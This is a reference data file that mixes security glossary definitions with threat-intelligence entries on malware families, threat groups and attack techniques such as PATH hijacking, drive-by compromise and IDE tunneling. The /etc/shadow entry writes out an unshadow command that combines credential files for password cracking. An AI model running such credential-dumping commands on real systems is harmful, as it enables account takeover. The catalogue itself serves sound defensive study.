Name: Siloscape
Type: malware
Description: Siloscape is malware that targets Kubernetes clusters through Windows containers. Siloscape was first observed in March 2021.

Term: NVD
Definition: The U.S. Government repository of standards-based vulnerability management data, enabling automation of vulnerability management, security measurement, and compliance (e.g., FISMA).

Term: nonce
Definition: A value that is only used once.

Term: Capability, Software Asset Management
Definition: An ISCM capability that identifies unauthorized software on devices that is likely to be used by attackers as a platform from which to extend compromise of the network to be mitigated.

Term: accountability
Definition: The security objective that generates the requirement for actions of an entity to be traced uniquely to that entity. This supports non-repudiation, deterrence, fault isolation, intrusion detection and prevention, and after- action recovery and legal action.

Term: information security continuous monitoring (ISCM)
Definition: Maintaining ongoing awareness of information security, vulnerabilities, and threats to support organizational risk management decisions. 
[Note: The terms “continuous” and “ongoing” in this context mean that security controls and organizational risks are assessed and analyzed at a frequency sufficient to support risk-based security decisions to adequately protect organization information.]

Term: asymmetric cryptography
Definition: Cryptography that uses separate keys for encryption and decryption; also known as public key cryptography.

Term: Assurance of possession
Definition: Assurance that the owner or claimed signatory actually possesses the private signature key.

Term: sanitization
Definition: The removal of extraneous or potentially harmful data (e.g., malware) within a file or other information container (e.g., network protocol packet).

Name: VersaMem
Type: malware
Description: VersaMem is a web shell designed for deployment to Versa Director servers following exploitation. Discovered in August 2024, VersaMem was used during Versa Director Zero Day Exploitation by Volt Typhoon to target ISPs and MSPs. VersaMem is deployed as a Java Archive (JAR) and allows for credential capture for Versa Director logon activity as well as follow-on execution of arbitrary Java payloads.

Term: Identity Assurance Level (IAL)
Definition: A category that conveys the degree of confidence that the applicant’s claimed identity is their real identity.

Term: Seed
Definition: A bit string used as input to a pseudorandom process.

Term: TiB
Definition: 2<sup>40</sup> bytes.

Term: Core Baseline
Definition: A set of&nbsp;device cybersecurity capabilities and non-technical supporting capabilities needed to support common cybersecurity controls that protect the customer’s devices and device data, systems, and ecosystems.

Term: Security Audit Trail
Definition: Data collected and potentially used to facilitate a security audit.

Name: SILENTTRINITY
Type: tool
Description: SILENTTRINITY is an open source remote administration and post-exploitation framework primarily written in Python that includes stagers written in Powershell, C, and Boo. SILENTTRINITY was used in a 2019 campaign against Croatian government agencies by unidentified cyber actors.

Term: CI
Definition: System and assets, whether physical or virtual, so vital to the United States that the incapacity or destruction of such systems and assets would have a debilitating impact on security, national economic security, national public health or safety, or any combination of those matters.

Name: /etc/passwd and /etc/shadow
Type: attack-pattern
Description: Adversaries may attempt to dump the contents of <code>/etc/passwd</code> and <code>/etc/shadow</code> to enable offline password cracking. Most modern Linux operating systems use a combination of <code>/etc/passwd</code> and <code>/etc/shadow</code> to store user account information, including password hashes in <code>/etc/shadow</code>. By default, <code>/etc/shadow</code> is only readable by the root user.

Linux stores user information such as user ID, group ID, home directory path, and login shell in <code>/etc/passwd</code>. A "user" on the system may belong to a person or a service. All password hashes are stored in <code>/etc/shadow</code> - including entries for users with no passwords and users with locked or disabled accounts.

Adversaries may attempt to read or dump the <code>/etc/passwd</code> and <code>/etc/shadow</code> files on Linux systems via command line utilities such as the <code>cat</code> command. Additionally, the Linux utility <code>unshadow</code> can be used to combine the two files in a format suited for password cracking utilities such as John the Ripper - for example, via the command <code>/usr/bin/unshadow /etc/passwd /etc/shadow > /tmp/crack.password.db</code>. Since the user information stored in <code>/etc/passwd</code> are linked to the password hashes in <code>/etc/shadow</code>, an adversary would need to have access to both.

Term: key agreement
Definition: A (pair-wise) key-establishment procedure in which the resultant secret keying material is a function of information contributed by both participants, so that neither party can predetermine the value of the secret keying material independently from the contributions of the other party. Contrast with key-transport.

Term: Defensive Design
Definition: Design techniques which explicitly protect supply chain elements from future attacks or adverse events. Defensive design addresses the technical, behavioral, and organizational activities. It is intended to create options that preserve the integrity of the mission and system function and its performance to the end user or consumer of the supply chain element.

Term: Bitstring
Definition: An ordered sequence (string) of 0s and 1s. The leftmost bit is the most significant bit.

Name: Path Interception by PATH Environment Variable
Type: attack-pattern
Description: Adversaries may execute their own malicious payloads by hijacking environment variables used to load libraries. The PATH environment variable contains a list of directories (User and System) that the OS searches sequentially through in search of the binary that was called from a script or the command line. 

Adversaries can place a malicious program in an earlier entry in the list of directories stored in the PATH environment variable, resulting in the operating system executing the malicious binary rather than the legitimate binary when it searches sequentially through that PATH listing.

For example, on Windows if an adversary places a malicious program named "net.exe" in `C:\example path`, which by default precedes `C:\Windows\system32\net.exe` in the PATH environment variable, when "net" is executed from the command-line the `C:\example path` will be called instead of the system's legitimate executable at `C:\Windows\system32\net.exe`. Some methods of executing a program rely on the PATH environment variable to determine the locations that are searched when the path for the program is not given, such as executing programs from a Command and Scripting Interpreter.

Adversaries may also directly modify the $PATH variable specifying the directories to be searched. An adversary can modify the `$PATH` variable to point to a directory they have write access. When a program using the $PATH variable is called, the OS searches the specified directory and executes the malicious binary. On macOS, this can also be performed through modifying the $HOME variable. These variables can be modified using the command-line, launchctl, Unix Shell Configuration Modification, or modifying the `/etc/paths.d` folder contents.

Term: White Box Testing
Definition: A test methodology that assumes explicit and substantial knowledge of the internal structure and implementation detail of the assessment object. Also known as white box testing.

Term: multi-factor authentication
Definition: Authentication using two or more different factors to achieve authentication. Factors include something you know (e.g., PIN, password); something you have (e.g., cryptographic identification device, token); or something you are (e.g., biometric).

Term: token
Definition: See Authenticator.

Name: Emotet
Type: malware
Description: Emotet is a modular malware variant which is primarily used as a downloader for other malware variants such as TrickBot and IcedID. Emotet first emerged in June 2014, initially targeting the financial sector, and has expanded to multiple verticals over time.

Term: Key states
Definition: A categorization of the states that a key can assume during its lifetime. See [NIST SP 800-57 Part 1].

Term: Ideal Random Bitstring
Definition: See Ideal Random Sequence.

Term: party
Definition: An individual (person), organization, device or process. Used interchangeably with “party”.

Term: specification
Definition: An assessment object that includes document-based artifacts (e.g., policies, procedures, plans, system security requirements, functional specifications, and architectural designs) associated with an information system.

Term: authenticate
Definition: Verifying the identity of a user, process, or device, often as a prerequisite to allowing access to resources in a system.

Term: information security officer
Definition: See Senior Agency Information Security Officer.

Term: message authentication code (MAC)
Definition: A cryptographic checksum on data that uses a symmetric key to detect both accidental and intentional modifications of data.

Term: flooding
Definition: An attack that attempts to cause a failure in a system by providing more input than the system can process properly.

Term: Presentation Attack Detection (PAD)
Definition: An automated determination of a presentation attack

Name: SilverTerrier
Type: intrusion-set
Description: SilverTerrier is a Nigerian threat group that has been seen active since 2014. SilverTerrier mainly targets organizations in high technology, higher education, and manufacturing.

Term: token
Definition: An entity that facilitates authentication of other entities attached to the same LAN using a public key certificate.

Term: system element
Definition: See system element.

Term: mission assurance
Definition: A process to protect or ensure the continued function and resilience of capabilities and assets—including personnel, equipment, facilities, networks, information and information systems, infrastructure, and supply chains—critical to the execution of organizational mission-essential functions in any operating environment or condition.

Term: ID
Definition: Unique data used to represent a person’s identity and associated attributes. A name or a card number are examples of identifiers.

Term: cryptographic erase
Definition: A method of sanitization in which the media encryption key (MEK) for the encrypted Target Data is sanitized, making recovery of the decrypted Target Data infeasible.

Term: key
Definition: A parameter used with a cryptographic algorithm that determines its operation.

Term: authorize processing
Definition: See authorization.

Term: Representative (of a key owner)
Definition: See Sponsor (of a key).

Term: identity verification
Definition: Internal phase within the NVD where a second, usually more experienced, NVD Analyst verifies the work completed during the Initial Analysis.

Name: Leviathan
Type: intrusion-set
Description: Leviathan is a Chinese state-sponsored cyber espionage group that has been attributed to the Ministry of State Security's (MSS) Hainan State Security Department and an affiliated front company. Active since at least 2009, Leviathan has targeted the following sectors: academia, aerospace/aviation, biomedical, defense industrial base, government, healthcare, manufacturing, maritime, and transportation across the US, Canada, Australia, Europe, the Middle East, and Southeast Asia.

Term: threat analysis
Definition: The examination of threat sources against system vulnerabilities to determine the threats for a particular system in a particular operational environment.

Name: Malware
Type: attack-pattern
Description: Adversaries may develop malware and malware components that can be used during targeting. Building malicious software can include the development of payloads, droppers, post-compromise tools, backdoors (including backdoored images), packers, C2 protocols, and the creation of infected removable media. Adversaries may develop malware to support their operations, creating a means for maintaining control of remote machines, evading defenses, and executing post-compromise behaviors.

During malware development, adversaries may intentionally include indicators aligned with other known actors in order to mislead attribution by defenders.

As with legitimate development efforts, different skill sets may be required for developing malware. The skills needed may be located in-house, or may need to be contracted out. Use of a contractor may be considered an extension of that adversary's malware development capabilities, provided the adversary plays a role in shaping requirements and maintains a degree of exclusivity to the malware.

Some aspects of malware development, such as C2 protocol development, may require adversaries to obtain additional infrastructure. For example, malware developed that will communicate with Twitter for C2, may require use of Web Services.

Term: <em>Confidence interval</em>
Definition: An interval estimate [low, high] of a population parameter. If the population is repeatedly sampled, and confidence intervals are computed for each sample with significance level α, approximately 100(1− α) % of the intervals are expected to contain the true population parameter.

Term: Egress Filtering
Definition: Filtering of outgoing network traffic.

Name: FELIXROOT
Type: malware
Description: FELIXROOT is a backdoor that has been used to target Ukrainian victims.

Name: HAWKBALL
Type: malware
Description: HAWKBALL is a backdoor that was observed in targeting of the government sector in Central Asia.

Name: Duqu
Type: malware
Description: Duqu is a malware platform that uses a modular approach to extend functionality after deployment within a target network.

Name: VIRTUALPITA
Type: malware
Description: VIRTUALPITA is a passive backdoor with ESXi and Linux vCenter variants capable of command execution, file transfer, and starting and stopping processes. VIRTUALPITA has been in use since at least 2022 including by UNC3886 who leveraged malicious vSphere Installation Bundles (VIBs) for install on ESXi hypervisors.

Term: Network Interface
Definition: An interface that connects the IoT device to a network.

Name: IDE Tunneling
Type: attack-pattern
Description: Adversaries may abuse Integrated Development Environment (IDE) software with remote development features to establish an interactive command and control channel on target systems within a network. IDE tunneling combines SSH, port forwarding, file sharing, and debugging into a single secure connection, letting developers work on remote systems as if they were local. Unlike SSH and port forwarding, IDE tunneling encapsulates an entire session and may use proprietary tunneling protocols alongside SSH, allowing adversaries to blend in with legitimate development workflows. Some IDEs, like Visual Studio Code, also provide CLI tools (e.g., `code tunnel`) that adversaries may use to programmatically establish tunnels and generate web-accessible URLs for remote access. These tunnels can be authenticated through accounts such as GitHub, enabling the adversary to control the compromised system via a legitimate developer portal.

Additionally, adversaries may use IDE tunneling for persistence. Some IDEs, such as Visual Studio Code and JetBrains, support automatic reconnection. Adversaries may configure the IDE to auto-launch at startup, re-establishing the tunnel upon execution. Compromised developer machines may also be exploited as jump hosts to move further into the network.

IDE tunneling tools may be built-in or installed as IDE Extensions.

Term: Awareness
Definition: The ability of the user to recognize and avoid behaviors that could compromise cybersecurity and to act wisely and cautiously to increase cybersecurity.

Term: Key-derivation function
Definition: As used in this Recommendation, either a one-step key-derivation method or a key-derivation function based on a pseudorandom function as specified in SP 800-108.

Term: <em>ICV1</em>
Definition: The 64-bit default ICV for KW:0xA6A6A6A6A6A6A6A6.

Term: SOA
Definition: A set of principles and methodologies for designing and developing software in the form of interoperable services. These services are well-defined business functions that are built as software components (i.e., discrete pieces of code and/or data structures) that can be reused for different purposes.

Term: security control and privacy control
Definition: measure that is modifying risk. (Note: controls include any process, policy, device, practice, or other actions which modify risk.)

Term: Third-Party Relationships
Definition: Relationships with external entities. External entities may include, for example, service providers, vendors, supply-side partners, demand-side partners, alliances, consortiums, and investors, and may include both contractual and non-contractual parties.

Term: Inter-Enterprise Subsystem
Definition: The portion of the RFID system that connects multiple enterprise subsystems together. The inter-enterprise subsystem consists of network infrastructure, a naming service, and possibly a discovery service. Inter-enterprise subsystems are most commonly associated with supply chain applications.

Term: architecture
Definition: A highly structured specification of an acceptable approach within a framework for solving a specific problem. An architecture contains descriptions of all the <i>components</i> of a selected, acceptable solution while allowing certain details of specific <i>components</i> to be variable to satisfy related constraints (e.g., costs, local environment, user acceptability).

Term: nonce
Definition: An input value to the authenticated encryption algorithm that is used only once for encryption performed under a given key.

Term: Concatenation
Definition: Concatenation operation; for example, a || b means that string b is appended after string a.

Term: TCP
Definition: TCP is one of the main protocols in TCP/IP networks. Whereas the IP protocol deals only with packets, TCP enables two hosts to establish a connection and exchange streams of data. TCP guarantees the delivery of data and also guarantees that packets will be delivered in the same order in which they were sent.&nbsp;

Term: Forward Cipher Function
Definition: One of the two functions of the block cipher algorithm that is determined by the choice of a cryptographic key. The term “forward cipher operation” is used for TDEA, while the term “forward transformation” is used for DEA.

Name: Penquin
Type: malware
Description: Penquin is a remote access trojan (RAT) with multiple versions used by Turla to target Linux systems since at least 2014.

Term: <em>X</em>
Definition: The smallest integer that is larger than or equal to X. The ceiling of X.

Term: availability
Definition: The ability for authorized users to access systems as needed.

Term: Identity Management System (IDMS)
Definition: One or more systems or applications that manage the identity proofing, registration, and issuance processes.

Term: clean word list
Definition: List of words that are acceptable, but would normally be rejected because they contain a word on the dirty word list (e.g., secret within secretary).

Term: data integrity
Definition: The property that data has not been altered by an unauthorized entity.

Term: Application Interface Capability
Definition: The ability for other computing devices to communicate with an IoT device through an IoT device application.

Term: Federation Assurance Level (FAL)
Definition: A category describing the assertion protocol used by the federation to communicate authentication and attribute information (if applicable) to a relying party (RP). Note: NIST SP 800-63-3 describes three levels of assurance.

Name: TAINTEDSCRIBE
Type: malware
Description: TAINTEDSCRIBE is a fully-featured beaconing implant integrated with command modules used by Lazarus Group. It was first reported in May 2020.

Term: availability
Definition: Timely, reliable access to information by authorized entities.

Term: <em>X⊕Y</em>
Definition: The bitwise exclusive-OR of two bit strings X and Y of the same length.

Term: AO
Definition: Senior federal official or executive with the authority to formally assume responsibility for operating an information system at an acceptable level of risk to organizational operations (including mission, functions, image, or reputation), organizational assets, individuals, other organizations, and the Nation.

Term: Poisson Distribution
Definition: Poisson distributions model (some) discrete random variables. Typically, a Poisson random variable is a count of the number of rare events that occur in a certain time interval.

Term: Threat Assessment/Analysis
Definition: Formal description and evaluation of threat to an information system.

Name: Heyoka Backdoor
Type: malware
Description: Heyoka Backdoor is a custom backdoor--based on the Heyoka open source exfiltration tool--that has been used by Aoqin Dragon since at least 2013.

Term: malware
Definition: See malicious code and malicious logic.

Term: Biometric Authentication (BIO, BIO-A)
Definition: A form of authentication in which authenticity is established by biometric verification of a new biometric sample from a cardholder to a biometric data record read from the cardholder’s activated PIV Card. In BIO, the biometric sample may be captured from the cardholder in isolation, while in BIO-A, an attendant must oversee the process of biometric capture.

Name: Confluence
Type: attack-pattern
Description: Adversaries may leverage Confluence repositories to mine valuable information. Often found in development environments alongside Atlassian JIRA, Confluence is generally used to store development-related documentation, however, in general may contain more diverse categories of useful information, such as:

* Policies, procedures, and standards
* Physical / logical network diagrams
* System architecture diagrams
* Technical system documentation
* Testing / development credentials (i.e., Unsecured Credentials)
* Work / project schedules
* Source code snippets
* Links to network shares and other internal resources

Term: cybersecurity event
Definition: A cybersecurity change that may have an impact on organizational operations (including mission, capabilities, or reputation).

Term: Ad Hoc Network
Definition: A wireless network that dynamically connects wireless client devices to each other without the use of an infrastructure device, such as an access point or a base station.

Term: <em>Submitter</em>
Definition: The party that submits the entire entropy source and output from its components for validation. The submitter can be any entity that can provide validation information as required by this Recommendation (e.g., developer, designer, vendor or any organization).

Name: Drive-by Compromise
Type: attack-pattern
Description: Adversaries may gain access to a system through a user visiting a website over the normal course of browsing. Multiple ways of delivering exploit code to a browser exist (i.e., Drive-by Target), including:

* A legitimate website is compromised, allowing adversaries to inject malicious code
* Script files served to a legitimate website from a publicly writeable cloud storage bucket are modified by an adversary
* Malicious ads are paid for and served through legitimate ad providers (i.e., Malvertising)
* Built-in web application interfaces that allow user-controllable content are leveraged for the insertion of malicious scripts or iFrames (e.g., cross-site scripting)

Browser push notifications may also be abused by adversaries and leveraged for malicious code injection via User Execution. By clicking "allow" on browser push notifications, users may be granting a website permission to run JavaScript code on their browser.

Often the website used by an adversary is one visited by a specific community, such as government, a particular industry, or a particular region, where the goal is to compromise a specific user or set of users based on a shared interest. This kind of targeted campaign is often referred to a strategic web compromise or watering hole attack. There are several known examples of this occurring.

Typical drive-by compromise process:

1. A user visits a website that is used to host the adversary controlled content.
2. Scripts automatically execute, typically searching versions of the browser and plugins for a potentially vulnerable version. The user may be required to assist in this process by enabling scripting, notifications, or active website components and ignoring warning dialog boxes.
3. Upon finding a vulnerable version, exploit code is delivered to the browser.
4. If exploitation is successful, the adversary will gain code execution on the user's system unless other protections are in place. In some cases, a second visit to the website after the initial scan is required before exploit code is delivered.

Unlike Exploit Public-Facing Application, the focus of this technique is to exploit software on a client endpoint upon visiting a website. This will commonly give an adversary access to systems on the internal network instead of external systems that may be in a DMZ.

Name: Local Email Collection
Type: attack-pattern
Description: Adversaries may target user email on local systems to collect sensitive information. Files containing email data can be acquired from a user’s local system, such as Outlook storage or cache files.

Outlook stores data locally in offline data files with an extension of .ost. Outlook 2010 and later supports .ost file sizes up to 50GB, while earlier versions of Outlook support up to 20GB. IMAP accounts in Outlook 2013 (and earlier) and POP accounts use Outlook Data Files (.pst) as opposed to .ost, whereas IMAP accounts in Outlook 2016 (and later) use .ost files. Both types of Outlook data files are typically stored in `C:\Users\<username>\Documents\Outlook Files` or `C:\Users\<username>\AppData\Local\Microsoft\Outlook`.

Term: data spillage
Definition: See spillage.

Term: Initialization Vector (IV)
Definition: A vector used in defining the starting point of a cryptographic process (e.g., encryption and key wrapping).

Term: ICS
Definition: a general term that encompasses several types of control systems, including supervisory control and data acquisition (SCADA) systems, distributed control systems (DCS), and other control system configurations such as Programmable Logic Controllers (PLC) often found in the industrial sectors and critical infrastructures.

Name: Selective Exclusion
Type: attack-pattern
Description: Adversaries may intentionally exclude certain files, folders, directories, file types, or system components from encryption or tampering during a ransomware or malicious payload execution. Some file extensions that adversaries may avoid encrypting include `.dll`, `.exe`, and `.lnk`. 

Adversaries may perform this behavior to avoid alerting users, to evade detection by security tools and analysts, or, in the case of ransomware, to ensure that the system remains operational enough to deliver the ransom notice. 

Exclusions may target files and components whose corruption would cause instability, break core services, or immediately expose the attack. By carefully avoiding these areas, adversaries maintain system responsiveness while minimizing indicators that could trigger alarms or otherwise inhibit achieving their goals.

Term: Logo
Definition: The NIST National Checklist Program logo.

Term: Policy
Definition: The representation of rules or relationships that makes it possible to determine if a requested access should be allowed, given the values of the attributes of the subject/entity, object/resource, and possibly environment conditions.

Term: cardholder
Definition: An individual who possesses an issued PIV Card.

Term: Separation of Duty (SOD)
Definition: A security principle that divides critical functions among different staff members in an attempt to ensure that no one individual has enough information or access privilege to perpetrate damaging fraud.

Term: vulnerability analysis
Definition: Systematic examination of an information system or product to determine the adequacy of security and privacy measures, identify security and privacy deficiencies, provide data from which to predict the effectiveness of proposed security and privacy measures, and confirm the adequacy of such measures after implementation.

Name: System Information Discovery
Type: attack-pattern
Description: An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use this information to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions. This behavior is distinct from Local Storage Discovery which is an adversary's discovery of local drive, disks and/or volumes.

Tools such as Systeminfo can be used to gather detailed system information. If running with privileged access, a breakdown of system data can be gathered through the <code>systemsetup</code> configuration tool on macOS. Adversaries may leverage a Network Device CLI on network devices to gather detailed system information (e.g. <code>show version</code>). On ESXi servers, threat actors may gather system information from various esxcli utilities, such as `system hostname get` and `system version get`.

Infrastructure as a Service (IaaS) cloud providers such as AWS, GCP, and Azure allow access to instance and virtual machine information via APIs. Successful authenticated API calls can return data such as the operating system platform and status of a particular instance or the model view of a virtual machine.

System Information Discovery combined with information gathered from other forms of discovery and reconnaissance can drive payload development and concealment.

Term: base assessment
Definition: The ISCMAx assessment file from which a merge is initiated.

Term: assurance evidence
Definition: The information upon which decisions regarding assurance, trustworthiness, and risk of the solution are substantiated.

Term: KMP
Definition: Documents how key management for current and/or planned cryptographic products and services will be implemented to ensure lifecycle key management support for cryptographic processes.

Name: Input Injection
Type: attack-pattern
Description: Adversaries may simulate keystrokes on a victim’s computer by various means to perform any type of action on behalf of the user, such as launching the command interpreter using keyboard shortcuts, typing an inline script to be executed, or interacting directly with a GUI-based application. These actions can be preprogrammed into adversary tooling or executed through physical devices such as Human Interface Devices (HIDs).

For example, adversaries have used tooling that monitors the Windows message loop to detect when a user visits bank-specific URLs. If detected, the tool then simulates keystrokes to open the developer console or select the address bar, pastes malicious JavaScript from the clipboard, and executes it - enabling manipulation of content within the browser, such as replacing bank account numbers during transactions.

Adversaries have also used malicious USB devices to emulate keystrokes that launch PowerShell, leading to the download and execution of malware from adversary-controlled servers.

Name: Purchase Technical Data
Type: attack-pattern
Description: Adversaries may purchase technical information about victims that can be used during targeting. Information about victims may be available for purchase within reputable private sources and databases, such as paid subscriptions to feeds of scan databases or other data aggregation services. Adversaries may also purchase information from less-reputable sources such as dark web or cybercrime blackmarkets.

Adversaries may purchase information about their already identified targets, or use purchased data to discover opportunities for successful breaches. Threat actors may gather various technical details from purchased data, including but not limited to employee contact information, credentials, or specifics regarding a victim’s infrastructure. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: Phishing for Information or Search Open Websites/Domains), establishing operational resources (ex: Develop Capabilities or Obtain Capabilities), and/or initial access (ex: External Remote Services or Valid Accounts).

Term: key pair
Definition: A public key and its corresponding private key; a key pair is used with a public-key (asymmetric-key) algorithm.

Term: assurance
Definition: Grounds for confidence that the other four security goals (integrity, availability, confidentiality, and accountability) have been adequately met by a specific implementation. “Adequately met” includes (1) functionality that performs correctly, (2) sufficient protection against unintentional errors (by users or software), and (3) sufficient resistance to intentional penetration or by-pass.

Name: SLOWPULSE
Type: malware
Description: SLOWPULSE is a malware that was used by APT5 as early as 2020 including against U.S. Defense Industrial Base (DIB) companies. SLOWPULSE has several variants and can modify legitimate Pulse Secure VPN files in order to log credentials and bypass single and two-factor authentication flows.

Term: security control assessment
Definition: A completed or planned action of evaluation of an organization, a mission or business process, or one or more systems and their environments; or

Term: BGP-SRx
Definition: BGP Secure Routing Extension consisting of multiple software modules that implement Route Origin Validation as well as BGPsec Path Validation.

Name: JPIN
Type: malware
Description: JPIN is a custom-built backdoor family used by PLATINUM. Evidence suggests developers of JPIN and Dipsind code bases were related in some way.

Name: Double File Extension
Type: attack-pattern
Description: Adversaries may abuse a double extension in the filename as a means of masquerading the true file type. A file name may include a secondary file type extension that may cause only the first extension to be displayed (ex: <code>File.txt.exe</code> may render in some views as just <code>File.txt</code>). However, the second extension is the true file type that determines how the file is opened and executed. The real file extension may be hidden by the operating system in the file browser (ex: explorer.exe), as well as in any software configured using or similar to the system’s policies. 

Adversaries may abuse double extensions to attempt to conceal dangerous file types of payloads. A very common usage involves tricking a user into opening what they think is a benign file type but is actually executable code. Such files often pose as email attachments and allow an adversary to gain Initial Access into a user’s system via Spearphishing Attachment then User Execution. For example, an executable file attachment named <code>Evil.txt.exe</code> may display as <code>Evil.txt</code> to a user. The user may then view it as a benign text file and open it, inadvertently executing the hidden malware.

Common file types, such as text files (.txt, .doc, etc.) and image files (.jpg, .gif, etc.) are typically used as the first extension to appear benign. Executable extensions commonly regarded as dangerous, such as .exe, .lnk, .hta, and .scr, often appear as the second extension and true file type.

Term: Workflow Management System
Definition: A computerized information system that is responsible for scheduling and synchronizing the various tasks within the workflow, in accordance with specified task dependencies, and for sending each task to the respective processing entity (e.g., Web server or database server). The data resources that a task uses are called work items.

Term: applicant
Definition: An individual who has applied for, but has not yet been issued, a Derived PIV Credential.

Term: Cryptographic module
Definition: The set of hardware, software, and/or firmware that implements security functions (including cryptographic algorithms and keygeneration methods) and is contained within a cryptographic module boundary. See FIPS 140.

Term: digital identity
Definition: Information that is unique within a security domain and which is recognized as denoting a particular entity within that domain.

Name: Non-Standard Port
Type: attack-pattern
Description: Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088 or port 587 as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.

Adversaries may also make changes to victim systems to abuse non-standard ports. For example, Registry keys and other configuration settings can be used to modify protocol and port pairings.

Term: Valid Data Element
Definition: A payload, an associated data string, or a nonce that satisfies the restrictions of the formatting function.

Name: SPACESHIP
Type: malware
Description: SPACESHIP is malware developed by APT30 that allows propagation and exfiltration of data over removable devices. APT30 may use this capability to exfiltrate data across air-gaps.

Term: metadata
Definition: Information used to describe specific characteristics, constraints, acceptable uses and parameters of another data item (e.g., a cryptographic key).

Term: Pre-Market Capability
Definition: A cybersecurity or privacy capability built into an IoT device. Pre-market capabilities are integrated into IoT devices by the manufacturer or vendor before they are shipped to customer organizations.

Term: jitter
Definition: The short-term variations of the significant instants of a timing signal from their ideal positions in time (where short-term implies that these variations are of frequency greater than or equal to 10 Hz).

Term: memorized secret
Definition: A string of characters (letters, numbers, and other symbols) that is used to authenticate an identity, to verify access authorization, or to derive cryptographic keys.

Term: RA
Definition: The process of identifying risks to organizational operations (including mission, functions, image, reputation), organizational assets, individuals, other organizations, and the Nation, resulting from the operation of an information system.
Part of risk management, incorporates threat and vulnerability analyses, and considers mitigations provided by security controls planned or in place.  Synonymous with risk analysis.

Term: ciphertext
Definition: Data in its encrypted form.

Term: operational environment
Definition: Standalone, Managed, or Custom (including Specialized Security-Limited Functionality, Legacy, and Sector Specific).

Term: data curator
Definition: In a trust model for differential privacy, the data curator is where the data is aggregated.

Term: authenticity
Definition: The property that data originated from its purported source. In the context of a key-wrap algorithm, the source of authentic data is an entity with access to an implementation of the authenticated-encryption function with the KEK.

Term: telecommunications
Definition: The preparation, transmission, communication, or related processing of information (writing, images, sounds, or other data) by electrical, electromagnetic, electromechanical, electro-optical, or electronic means.

Term: <em>MacKeyLen</em>
Definition: Length in bytes of the MacKey.

Term: Filename
Definition: A unique name used to reference a file.

Term: information security continuous monitoring (ISCM)
Definition: Maintaining ongoing awareness of information security, vulnerabilities, and threats to support organizational risk management decisions. 
Note: The terms “continuous” and “ongoing” in this context mean that security controls and organizational risks are assessed and analyzed at a frequency sufficient to support risk-based security decisions to adequately protect organization information. 
See organizational information security continuous monitoring and automated security monitoring.

Term: domain
Definition: A set of subjects, their information objects, and a common security policy.

Term: fine‐tuning
Definition: In machine learning, a training step that starts from a pre‐trained model (sometimes called a foundation model) and adds task‐or domain‐specific information.

Name: Disco
Type: malware
Description: Disco is a custom implant that has been used by MoustachedBouncer since at least 2020 including in campaigns using targeted malicious content injection for initial access and command and control.

Name: Financial Theft
Type: attack-pattern
Description: Adversaries may steal monetary resources from targets through extortion, social engineering, technical theft, or other methods aimed at their own financial gain at the expense of the availability of these resources for victims. Financial theft is the ultimate objective of several popular campaign types including extortion by ransomware, business email compromise (BEC) and fraud, "pig butchering," bank hacking, and exploiting cryptocurrency networks. 

Adversaries may Compromise Accounts to conduct unauthorized transfers of funds. In the case of business email compromise or email fraud, an adversary may utilize Impersonation of a trusted entity. Once the social engineering is successful, victims can be deceived into sending money to financial accounts controlled by an adversary. This creates the potential for multiple victims (i.e., compromised accounts as well as the ultimate monetary loss) in incidents involving financial theft.

Extortion by ransomware may occur, for example, when an adversary demands payment from a victim after Data Encrypted for Impact and Exfiltration of data, followed by threatening to leak sensitive data to the public unless payment is made to the adversary. Adversaries may use dedicated leak sites to distribute victim data.

Due to the potentially immense business impact of financial theft, an adversary may abuse the possibility of financial theft and seeking monetary gain to divert attention from their true goals such as Data Destruction and business disruption.

Term: RD
Definition: All data concerning (i) design, manufacture, or utilization of atomic weapons; (ii) the production of special nuclear material; or (iii) the use of special nuclear material in the production of energy, but shall not include data declassified or removed from the Restricted Data category pursuant to Section 142 [of the Atomic Energy Act of 1954].

Name: Crutch
Type: malware
Description: Crutch is a backdoor designed for document theft that has been used by Turla since at least 2015.

Term: Target Name
Definition: A single WFN that is the target of a matching process. A matching engine compares a source WFN to a target WFN to determine whether or not there is a source-to-target match. In CPE 2.2 terms a target name is a single item in the list of known values (each N of K) and is equivalent to the N value in the CPE 2.2 Matching algorithm.

Term: senior agency information security officer (SAISO)
Definition: Official responsible for carrying out the Chief Information Officer responsibilities under FISMA and serving as the Chief Information Officer’s primary liaison to the agency’s authorizing officials, information system owners, and information system security officers. 
[Note: Organizations subordinate to federal agencies may use the term Senior Information Security Officer or Chief Information Security Officer to denote individuals filling positions with similar responsibilities to Senior Agency Information Security Officers.]

Term: ID
Definition: A bit string that is associated with a person, device or organization. It may be an identifying name, or may be something more abstract (for example, a string consisting of an IP address and timestamp), depending on the application.

Term: OLIR
Definition: Relationships between elements of two documents that are recorded in a NIST IR 8278A-compliant format and shared by the OLIR Catalog. There are three types of OLIRs: concept crosswalk, set theory relationship mapping, and supportive relationship mapping.

Term: PEP
Definition: Enforces policy decisions in response to a request from a subject requesting access to a protected object; the access control decisions are made by the policy decision point.

Name: OceanSalt
Type: malware
Description: OceanSalt is a Trojan that was used in a campaign targeting victims in South Korea, United States, and Canada. OceanSalt shares code similarity with SpyNote RAT, which has been linked to APT1.

Term: Key and metadata management functions
Definition: Functions performed by a CKMS or FCKMS in order to manage keys and metadata.

Name: Chrommme
Type: malware
Description: Chrommme is a backdoor tool written using the Microsoft Foundation Class (MFC) framework that was first reported in June 2021; security researchers noted infrastructure overlaps with Gelsemium malware.

Term: threat analysis
Definition: Assessment to evaluate the actual or potential effect of a threat to a system.
Note: The threat assessment may include identifying and describing the nature of the threat.

Name: Spearphishing via Service
Type: attack-pattern
Description: Adversaries may send spearphishing messages via third-party services in an attempt to gain access to victim systems. Spearphishing via service is a specific variant of spearphishing. It is different from other forms of spearphishing in that it employs the use of third party services rather than directly via enterprise email channels. 

All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, adversaries send messages through various social media services, personal webmail, and other non-enterprise controlled services. These services are more likely to have a less-strict security policy than an enterprise. As with most kinds of spearphishing, the goal is to generate rapport with the target or get the target's interest in some way. Adversaries will create fake social media accounts and message employees for potential job opportunities. Doing so allows a plausible reason for asking about services, policies, and software that's running in an environment. The adversary can then send malicious links or attachments through these services.

